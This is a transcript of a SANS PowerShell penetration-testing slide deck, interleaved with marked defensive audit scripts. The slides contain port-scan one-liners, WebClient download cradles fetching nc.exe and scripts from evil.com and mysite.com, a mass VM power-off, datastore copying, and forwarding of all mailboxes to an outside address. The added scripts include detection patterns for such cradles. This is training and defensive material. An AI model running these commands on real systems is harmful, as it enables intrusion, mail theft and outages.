TimMedin - SANS Information Security Training (PDF slide deck transcript, 42 slides)

Tim Medin

Posted 22-Mar-2018

Page 1: TimMedin - SANS Information Security Training

Tim Medin

Page 2

  Background
    ▪ Counter Hack Challenges
    ▪ Pen Tester – Internal, Perimeter, Web, Social, Telephony
    ▪ Corp Security – Financial Services
    ▪ Network Engineer – Higher Education
    ▪ Software Engineer – Manufacturing & Industrial
    ▪ Control Systems Engineer
  Contributions
    ▪ Laudanum
    ▪ CommandLineKungFu.com
    ▪ Packetstan.com
    ▪ Other blogs
    ▪ Local DefCon and Security Groups
    ▪ CCDC
    ▪ Local Universities

Page 3

  Coolness of PowerShell
  Basics of PowerShell
  Quick Command Line Attacks
  Script Execution
  3rd Party CmdLets

Page 4

  CMD is teh sUck!!1!
  Need upgrade, badly
  Nothing is standard
    ▪ Naming
    ▪ Switches
    ▪ Switch operators: dash v. slash
  Why would you want to parse anything? Are you too good for the For Loop!

Page 5

  Installed by default on Windows 7, Server 2008 R2, and later
  Full integration with Microsoft Server Products
    ▪ Exchange
    ▪ SharePoint
    ▪ Active Directory
  Third Party Apps too
    ▪ VMware!
  Full access to .NET Framework
  In short, FUN!

Page 6

  Basics of PowerShell

Page 7

  “CmdLets” are quite standard
  PowerShell Naming Convention
    ▪ Names are Verb-Noun
    ▪ Verbs standardized by Microsoft: Get vs. Read, Find vs. Search
  Common Parameter Names
  Help

Page 8

  We don’t have to parse text!
  Easily string together many commands
  Easier to read:  $_.Length  vs  cut -d' ' -f4
  Don’t have to know what the 4th item in the output is, as with cut or AWK

Page 9

  Just like other shells, but… Objects!

Find files containing “blah”:

Get-ChildItem | Select-String blah -List

Find files containing “blah”… and delete them:

Get-ChildItem | Select-String blah -List | Remove-Item

Page 10

  Prefixed with $
  Dot access properties and methods of an object

Page 11

  $_  Current Pipeline Object
    ▪ Used in script blocks, filters (Where-Object), ForEach-Object, and switches
  $true  $false  $null
  See them all with:

Get-ChildItem variable:

Page 12

PowerShell       PowerShell Alias    CMD            *nix
Get-ChildItem    ls, gci, dir        dir            ls
Copy-Item        cp, copy, cpi       copy           cp
Move-Item        move, mv, mi        move           mv
Select-String    <none>              find, findstr  grep
Get-Help         man, help           help           man
Get-Content      cat, gc, type       type           cat

  Easy! Aliases match CMD and Bash

Page 13

  ForEach-Object (alias %)
    ▪ Operates on each object passed down the pipeline
    ▪ Not to be confused with ForEach, a looping statement

Get-ChildItem | ForEach-Object { "do something with " + $_.Name }

ls | % { "do something with " + $_.Name }

  Where-Object (alias ?)
    ▪ Used to filter objects passed down the pipeline

Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" -and $_.Modules -like "*(iphlpapi.dll)*" -and $_.Modules -like "*(WININET.dll)*" }

Page 14

  Out-*
    ▪ Output to file, Host, Printer, …
  Export-CSV
    ▪ Exports objects, with names and properties
    ▪ Import-CSV can read it back in
  Group-Object
    ▪ Groups objects together based on properties
  Sort-Object

Page 15

  Get-Member (alias gm)
    ▪ Gets all the properties and methods of an object type
    ▪ Available properties and methods on files:  ls | gm
  Format-List (alias fl)
    ▪ Outputs the properties of all the objects passed down the pipeline, only “default” properties
    ▪ Use * to see all the properties:  ls | fl *
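As an added example (not from the slides), the pipeline vocabulary of Pages 13 to 15 (Where-Object, ForEach-Object, Group-Object, Format-List, Export-CSV) applied to a defender's task: inventory the running processes, check the Authenticode signature of each executable, and group the result by signature status. The output file name is an assumption; everything else is built-in Windows PowerShell.

```powershell
# Added example, not from the slides: inventory running processes and flag executables
# whose Authenticode signature is not valid. Output path is an assumption.

# Processes whose image path we can read (protected/system processes have no Path here)
$procs = Get-Process | Where-Object { $_.Path }

$inventory = $procs |
    Sort-Object Path -Unique |          # one row per distinct executable
    ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.Path
        [pscustomobject]@{
            Name      = $_.Name
            Path      = $_.Path
            Status    = $sig.Status     # Valid, NotSigned, HashMismatch, UnknownError, ...
            Publisher = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<unsigned>' }
        }
    }

# Group-Object: how many executables fall into each signature status
$inventory | Group-Object Status | Select-Object Name, Count

# Format-List *: every property of the rows that deserve a second look
$inventory | Where-Object { $_.Status -ne 'Valid' } | Format-List *

# Export-CSV: keep the object data for diffing against a known-good baseline later
$inventory | Export-Csv -NoTypeInformation -Path .\process-signatures.csv
```

Because the rows are objects rather than text, the same `$inventory` variable feeds the grouped summary, the detailed listing and the CSV export without any re-parsing, which is the point the slides make with `$_.Length` versus `cut`.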

Page 16

  Gets a list of commands (DUH!)
  With no parameters it lists everything
    ▪ -Noun <string>
    ▪ -Verb <string>
    ▪ -Module <string>: all cmdlets in a module (e.g. Exchange, VMware, etc.)
  Very useful for finding the cmdlet you need!

Page 17

  Can use it on aliases too (e.g. ls, mv)
  Default output isn’t really useful
  Useful switches
    ▪ -Examples (-ex for short)
    ▪ -Full

Page 18

  Aliases
  Parameters
    ▪ Need as much of the name as necessary to uniquely identify it.
      ✗ ls -f     “f” matches Filter & Force
      ✔ ls -fo    “fo” only matches Force
      ✔ ls -for   “for” only matches Force

Page 19

  Works for CmdLets AND PARAMETERS!
  Allows you to cycle through matching names

You complete me!

Page 20

Page 21

PS C:\> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.14",$_)) "$_ is open" } 2>$null
25 is open

Page 22

  Pseudo Code

1..1024 | foreach-object { print (connection_attempt “port is open”) }    Discard error message

  The trick

PS C:\> echo (1+1) (2+2)
2
4

PS C:\> echo (1/0) (2+2)
Attempt to divide by zero    <- 2+2 is not output

Page 23

PS C:\> 1..255 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null
10.1.1.5
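The one-liners on Pages 21 to 23 work because `Connect()` throws a terminating error when a port is closed, so `echo` never runs (the `echo (1/0) (2+2)` trick from Page 22). As an added example, not from the slides, here is the same TcpClient check written out for a defender's use: confirm that a host you administer exposes only the ports it is supposed to, for instance after a firewall or hardening change. The target address and the allowlist are constructed sample values; the explicit timeout matters because a filtered port (no RST) would otherwise hang for the OS default connect timeout, and each socket is disposed instead of leaked.

```powershell
# Added example, not from the slides: compare the TCP ports reachable on a host you
# administer with the ports that are supposed to be open. Target and allowlist are
# constructed sample values.

param(
    [string]$Target    = '10.1.1.14',   # sample address from the slides
    [int[]]$Ports      = 1..1024,
    [int[]]$Expected   = @(22, 443),    # constructed allowlist: ports that should answer
    [int]$TimeoutMs    = 200
)

function Test-TcpPort {
    param([string]$ComputerName, [int]$Port, [int]$TimeoutMs)
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $async = $client.BeginConnect($ComputerName, $Port, $null, $null)
        # Filtered ports send no RST; wait at most $TimeoutMs instead of the OS default
        if (-not $async.AsyncWaitHandle.WaitOne($TimeoutMs)) { return $false }
        $client.EndConnect($async)    # throws SocketException if the port is closed
        return $true
    } catch {
        return $false                 # the error the slides discard with 2>$null
    } finally {
        $client.Close()               # release the socket either way
    }
}

$open = foreach ($p in $Ports) {
    if (Test-TcpPort -ComputerName $Target -Port $p -TimeoutMs $TimeoutMs) { $p }
}

$unexpected = @($open     | Where-Object { $Expected -notcontains $_ })
$missing    = @($Expected | Where-Object { $open     -notcontains $_ })

"Open on ${Target}: $($open -join ', ')"
if ($unexpected) { "Open but not on the allowlist (check the service and firewall rule): $($unexpected -join ', ')" }
if ($missing)    { "Expected but not reachable: $($missing -join ', ')" }
```

Run it as `.\Test-Exposure.ps1 -Target 10.1.1.14 -Expected 22,443` (script name assumed) from a host that is allowed to reach the target; anything in the "not on the allowlist" line is a service or rule that needs an owner.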

Page 24

  Access a text file like this (to stdout):

(New-Object System.Net.WebClient).DownloadString("http://mysite.com/myevil.ps1")

  To save it to a file:

… | Out-File -Encoding ASCII myfile.ps1

Page 25

  What if we want to download an executable?

(New-Object System.Net.WebClient).DownloadFile("http://mysite.com/nc.exe", "c:\nc.exe")

  …but, we can’t PowerShell with netcat

Page 26

  Wants a Terminal
  From Meterpreter, go BOOM
  What about a script?

Page 27

  Default Execution Policy stops scripts
  Default mode is “Restricted”
  Change it to allow local, unsigned scripts with:  Set-ExecutionPolicy RemoteSigned
    ▪ Changing requires Admin Permissions
  BUT…

Page 28

Get-Help about_Execution_Policies

The execution policy is not a security system that restricts user actions. For example, users can easily circumvent a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users to set basic rules and prevents them from violating them unintentionally.

Page 29

C:\temp> powershell -command ls

    Directory: C:\temp

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         3/22/2012   5:10 PM         14 file2
-a---         3/22/2012   5:10 PM         12 file3

Page 30

C:\> powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://evil.com/nc.exe', 'nc.exe')"

Page 31

C:\temp> powershell -command ls

    Directory: C:\temp

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         3/22/2012   5:10 PM         14 file2
-a---         3/22/2012   5:10 PM         12 file3
-a---         3/23/2012  12:10 PM      61440 nc.exe
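Pages 24 to 31 show that the execution policy does not stop a download cradle typed after `powershell -command`. The control that does see it is script block logging: PowerShell 5 and later write every script block the engine compiles to Event ID 4104 in Microsoft-Windows-PowerShell/Operational, whether it came from a .ps1 file, `-command`, `-EncodedCommand` or the interactive prompt. The following hunt over that log is an added example, not from the slides; it assumes script block logging is enabled, and the pattern list and output path are constructed for the example.

```powershell
# Added example, not from the slides: find script blocks that look like the WebClient
# download cradles on Pages 24, 25 and 30 in the PowerShell operational log (Event ID 4104).
# Assumes PowerShell 5+ with script block logging turned on; patterns and path are
# constructed for this example, not an exhaustive signature set.

$patterns = @(
    'Net\.WebClient',
    '\.DownloadString\(',
    '\.DownloadFile\(',
    'Invoke-WebRequest',
    'Invoke-Expression|\biex\b',
    'FromBase64String'
)
$regex = $patterns -join '|'

$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'
    Id      = 4104
} -ErrorAction SilentlyContinue     # no events yet is not an error for this report

$hits = $events |
    Where-Object { $_.Message -match $regex } |
    ForEach-Object {
        $text = $_.Message -replace '\s+', ' '     # flatten the logged script block
        [pscustomobject]@{
            TimeCreated = $_.TimeCreated
            UserSid     = $_.UserId
            ProcessId   = $_.ProcessId
            Matched     = [regex]::Match($text, $regex, 'IgnoreCase').Value
            Snippet     = $text.Substring(0, [Math]::Min(200, $text.Length))
        }
    }

$hits | Sort-Object TimeCreated -Descending | Format-Table -AutoSize
$hits | Export-Csv -NoTypeInformation -Path .\ps-download-cradles.csv
```

Pair this with process creation auditing (Event ID 4688 with command-line logging) to see the `cmd.exe` to `powershell.exe -command "..."` lineage from Pages 29 to 31. Hosts still on the PowerShell 2.0 engine that shipped with Windows 7 and Server 2008 R2 produce no 4104 events at all, which is a reason to remove that engine where it is not needed.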

Page 32

  Run a script without running a script
    ▪ Uses Encoded Command
    ▪ DefCon 18 talk by Dave Kennedy (ReL1K) and Josh Kelley (Winfang)
  Windump
    ▪ Dump SAM via PowerShell, but has problems

Page 33

  Interface to VMware vSphere
  Extremely Powerful!
  Commands

Connect-VIServer vc1 -User tm -Password pw

Get-VM

Get-VM | Stop-VM -Confirm:$false    <- Power off Everything

DON’T RUN THIS!

Page 34

  I want data… data is on the servers… so get the whole server?

$ds = Get-Datastore <datastore-name>

New-PSDrive -Name MyDS -PSProvider VimDatastore -Root '\' -Location $ds

Copy-DatastoreItem MyDS:\Fldr2\ -Destination C:\temp

Page 35

  Firewall-Shmirewall!
  Runs a PowerShell script IN the guest OS of each of the specified virtual machines
  It does require credentials to access the Guest
    ▪ We can probably get those when we download the VM
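Every command on Pages 33 to 35 (powering off VMs, mounting and copying from a datastore, running a script inside a guest with PowerCLI's Invoke-VMScript) is gated by a vSphere privilege, so the defensive question is who holds those privileges and on which inventory objects. The following audit is an added example, not from the slides or from VMware: it assumes PowerCLI with an existing `Connect-VIServer` session, the privilege ids are the ones vSphere uses (confirm against your version with `Get-VIPrivilege`), and the output path is an assumption.

```powershell
# Added example, not from the slides: list the roles and permission assignments that grant
# the vSphere privileges behind Stop-VM, Copy-DatastoreItem and Invoke-VMScript, so that
# over-broad assignments can be reviewed. Requires PowerCLI and a connected VIServer.
# Privilege ids are vSphere's; verify them with Get-VIPrivilege on your version.

$privilegesOfInterest = @(
    'VirtualMachine.Interact.PowerOff',        # Stop-VM
    'Datastore.Browse',                        # New-PSDrive VimDatastore / Copy-DatastoreItem
    'Datastore.FileManagement',                # low-level datastore file operations
    'VirtualMachine.GuestOperations.Execute'   # Invoke-VMScript
)

# Roles that grant at least one of the privileges above
$riskyRoles = Get-VIRole | Where-Object {
    $role = $_
    @($privilegesOfInterest | Where-Object { $role.PrivilegeList -contains $_ }).Count -gt 0
}

# Permission assignments (principal + role + inventory object) that use those roles
$findings = Get-VIPermission |
    Where-Object { @($riskyRoles).Name -contains $_.Role } |
    ForEach-Object {
        $perm = $_
        $role = $riskyRoles | Where-Object { $_.Name -eq $perm.Role }
        [pscustomobject]@{
            Principal  = $perm.Principal
            IsGroup    = $perm.IsGroup
            Role       = $perm.Role
            Entity     = $perm.Entity.Name
            Propagate  = $perm.Propagate      # $true = inherited by every child object
            Privileges = ($privilegesOfInterest | Where-Object { $role.PrivilegeList -contains $_ }) -join ';'
        }
    }

$findings | Sort-Object Principal | Format-Table -AutoSize
$findings | Export-Csv -NoTypeInformation -Path .\vsphere-risky-permissions.csv
```

Assignments at the vCenter or datacenter root with `Propagate` set are the ones to question first: a principal with `Datastore.Browse` and `Datastore.FileManagement` there can pull any VM's disk files, which is exactly the Page 34 scenario.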

Page 36

  Why yes, I’d like all your email

Set-Mailbox joeuser -DeliverToMailboxAndForward:$True -ForwardingAddress [email protected]

Page 37

  Why yes, I’d like EVERYONE’S email

Get-Mailbox | Set-Mailbox -DeliverToMailboxAndForward:$True -ForwardingAddress [email protected]
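The Set-Mailbox one-liners on Pages 36 and 37 leave a durable artefact on every mailbox they touch: a populated ForwardingAddress or ForwardingSmtpAddress, usually with DeliverToMailboxAndForward set so the owner notices nothing. The audit below is an added example, not from the slides or from Microsoft; it uses the standard Exchange cmdlets and is meant to run in the Exchange Management Shell (or an implicit remoting session to an Exchange server). Accepted domains are read from Exchange itself; the output path is an assumption.

```powershell
# Added example, not from the slides: report every mailbox with forwarding configured and
# flag forwarding to domains Exchange does not own. Run in the Exchange Management Shell.
# Output path is an assumption.

$ourDomains = Get-AcceptedDomain | ForEach-Object { $_.DomainName.ToString().ToLower() }

$forwarding = Get-Mailbox -ResultSize Unlimited |
    Where-Object { $_.ForwardingAddress -or $_.ForwardingSmtpAddress } |
    ForEach-Object {
        # ForwardingSmtpAddress is "smtp:user@domain"; ForwardingAddress is an internal recipient
        $smtp   = if ($_.ForwardingSmtpAddress) { $_.ForwardingSmtpAddress.ToString() -replace '^smtp:', '' } else { $null }
        $domain = if ($smtp) { $smtp.Split('@')[-1].ToLower() } else { $null }
        [pscustomobject]@{
            Mailbox                    = $_.PrimarySmtpAddress
            ForwardingAddress          = $_.ForwardingAddress
            ForwardingSmtpAddress      = $smtp
            DeliverToMailboxAndForward = $_.DeliverToMailboxAndForward   # $true: owner still gets a copy, as on the slides
            External                   = [bool]($domain -and ($ourDomains -notcontains $domain))
        }
    }

$forwarding | Export-Csv -NoTypeInformation -Path .\mailbox-forwarding.csv
$forwarding | Where-Object External | Format-Table Mailbox, ForwardingSmtpAddress, DeliverToMailboxAndForward -AutoSize

"$(@($forwarding).Count) mailboxes forward; $(@($forwarding | Where-Object External).Count) to external domains"
```

Two follow-ups close the gap this report leaves: user-level inbox rules (`Get-InboxRule -Mailbox <user>`) can forward mail without touching the mailbox attributes, and the Exchange admin audit log (`Search-AdminAuditLog -Cmdlets Set-Mailbox`) records which account ran the Set-Mailbox command and when.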

Page 38

  Requires Domain Admin Permissions
  Providers
    ▪ Microsoft – requires one of the following: a Windows 2008 R2 Domain Controller, or a Windows 2008 R2 Server running Lightweight Directory Services
    ▪ Quest – client only (better for pen testing)
  List all users in a pretty CSV

Get-ADUser -Filter * | Export-CSV us.csv    <- MS
Get-QADUser | Export-CSV us.csv             <- Quest

Page 39

  All users without password expirations

Get-QADUser -Enabled -PasswordNeverExpires:$true
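The Page 39 query is also a standard account-hygiene audit. As an added example, not from the slides, here it is with the Microsoft ActiveDirectory module (the Get-ADUser provider from Page 38) rather than Quest's Get-QADUser, extended with what a reviewer needs to prioritise the findings: password age, last logon, and direct membership in privileged groups. The group pattern and output path are assumptions.

```powershell
# Added example, not from the slides: enabled accounts whose passwords never expire, with
# password age, last logon and privileged-group membership, exported for review.
# Group names in the pattern and the output path are assumptions.

Import-Module ActiveDirectory

$users = Get-ADUser -Filter { Enabled -eq $true -and PasswordNeverExpires -eq $true } `
                    -Properties PasswordNeverExpires, PasswordLastSet, LastLogonDate, MemberOf

# Direct membership only; nested group membership is not resolved here
$privilegedPattern = '^CN=(Domain Admins|Enterprise Admins|Schema Admins|Administrators),'

$report = foreach ($u in $users) {
    $priv = @($u.MemberOf | Where-Object { $_ -match $privilegedPattern })
    [pscustomobject]@{
        SamAccountName   = $u.SamAccountName
        PasswordLastSet  = $u.PasswordLastSet
        PasswordAgeDays  = if ($u.PasswordLastSet) { [int]((Get-Date) - $u.PasswordLastSet).TotalDays } else { $null }
        LastLogonDate    = $u.LastLogonDate
        Privileged       = ($priv.Count -gt 0)
        PrivilegedGroups = ($priv | ForEach-Object { ($_ -split ',')[0] -replace '^CN=', '' }) -join ';'
    }
}

# Privileged accounts with the oldest passwords first
$report | Sort-Object Privileged, PasswordAgeDays -Descending |
    Export-Csv -NoTypeInformation -Path .\password-never-expires.csv

# Quick summary: how many of these accounts are privileged
$report | Group-Object Privileged | Select-Object @{ n = 'Privileged'; e = { $_.Name } }, Count
```

A null PasswordLastSet on an enabled account means the password has never been set or must be changed at next logon; combined with PasswordNeverExpires it is worth a manual look rather than a sort.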

Page 40

  PowerShell is a significant upgrade from CMD
  We can use the same CMD Fu, but it’s easier (albeit more verbose)
  Lots of interaction with other products

Page 41

[email protected]

@timmedin

  SEC 560: Network Penetration Testing and Ethical Hacking – Dallas, June 18 – 23
  SEC 504: Hacker Techniques, Exploits and Incident Handling – Raleigh, July 16 – 21

Page 42

  Brute force VMware creds: http://blog.securitywhole.com/2009/09/01/brute-force-esx-usernamepassword.aspx
  PowerShell, it’s time to own: http://www.secmaniac.com/files/PowerShell_Defcon.pdf
  Command Line Kung Fu Blog: http://www.commandlinekungfu.com
  Hey! Scripting Guy!: http://blogs.technet.com/b/heyscriptingguy